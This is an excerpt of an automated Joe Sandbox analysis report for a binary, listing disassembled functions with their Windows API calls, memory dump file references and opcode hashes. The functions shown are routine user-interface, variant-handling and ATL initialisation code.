                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                            • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                                            • Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                            • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                                            APIs
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                              • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                            • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                                            • Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                            • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                                            APIs
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                              • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                            • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                                            • Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                            • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0045C534
                                                              • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                              • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                              • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                            • VariantClear.OLEAUT32(?), ref: 0045C556
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Variant$Init$ClearCopy_memmove
                                                            • String ID: d}K
                                                            • API String ID: 2932060187-3405784397
                                                            • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                            • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                                            • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                            • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                            • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                                            • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                            • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                                            APIs
                                                              • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                              • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                            • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                                            • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                            • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9